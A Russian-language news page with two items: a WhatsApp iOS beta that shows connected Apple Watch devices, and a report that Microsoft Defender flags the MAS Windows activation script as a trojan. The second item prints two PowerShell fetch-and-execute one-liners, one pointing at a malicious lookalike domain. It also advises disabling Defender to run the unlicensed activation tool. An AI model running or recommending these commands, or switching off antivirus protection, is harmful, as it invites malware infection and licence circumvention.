В бета-версии WhatsApp для iOS появилась видимость подключённых устройств

В бета-версии WhatsApp для iOS появилась видимость подключённых устройств

В бета-версии WhatsApp для iOS появилась видимость подключённых устройств

WhatsApp (принадлежит признанной в России экстремистской организации и запрещённой корпорации Meta) продолжает аккуратно расширять возможности своего iOS-клиента — и на этот раз с упором на прозрачность и контроль. В свежей версии приложения компания начала показывать подключённые периферийные устройства, в первую очередь Apple Watch, прямо в настройках аккаунта.

Недавно WhatsApp запустил бета-версию приложения для Apple Watch, которая позволяет читать сообщения, отвечать на них и просматривать медиа прямо с запястья.

Полной автономности пока нет — часы всё ещё зависят от iPhone, — но для повседневного общения это уже заметный шаг вперёд.

Теперь мессенджер решил сделать этот тип подключения более наглядным. В бета-версии WhatsApp для iOS 25.37.10.71, о которой пишет WABetaInfo, появилась новая возможность — мониторинг подключённых периферийных устройств.

В разделе «Связанные устройства» некоторые пользователи уже видят отдельный список периферии. Под этим WhatsApp понимает устройства, которые подключаются автоматически, без QR-кодов и шестизначных кодов подтверждения. Всё происходит в фоне — быстро и почти незаметно для пользователя.

Сейчас в этом списке отображается только Apple Watch, но логика явно рассчитана на будущее и другие типы устройств.

Для каждого подключённого устройства показываются название устройства и время последней активности.

Важный нюанс: в отличие от обычных связанных устройств, периферию нельзя отключить напрямую из WhatsApp. Чтобы разорвать соединение, нужно удалить приложение с самого устройства — например, с Apple Watch. После этого синхронизация прекращается, а устройство автоматически исчезает из списка.

Это не самый очевидный способ, но он гарантирует, что доступ будет полностью закрыт.

Новая функция решает сразу несколько задач:

  • даёт понимание, какие устройства имеют доступ к аккаунту;
  • снижает путаницу с доставкой сообщений и уведомлений;
  • повышает прозрачность и контроль над безопасностью.

Особенно полезно это может быть в ситуациях, когда пользователь не помнит о подключении Apple Watch — или вовсе не владеет ими. Если в списке вдруг появляется незнакомая периферия, это прямой сигнал проверить безопасность своего Apple ID.

Хотя новинка появилась в бета-версии, некоторые пользователи стабильной версии WhatsApp из App Store тоже уже видят список периферийных устройств. Это говорит о постепенном и довольно широком развёртывании функции.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru